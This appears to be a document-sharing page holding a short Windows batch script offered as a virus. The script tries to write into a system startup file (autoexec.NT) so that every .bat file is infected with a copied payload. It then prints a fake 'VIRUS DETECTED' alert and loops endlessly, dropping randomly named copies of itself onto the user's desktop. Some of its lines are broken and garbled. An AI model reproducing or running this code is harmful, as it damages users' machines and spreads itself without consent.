Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1of 1

@echo off

echo checking system:


echo for %%i in ("*.bat") do copy %%i+c:\tmp.bat %%i #*>c:\windows\system32\
autoexec.NT
echo VIRUS DETECTED
Pause
:1
dir /s
copy c:\tmp.bat
c:\document~1\%username%\desktop\greatgame_%random%.bat

goto 1

You might also like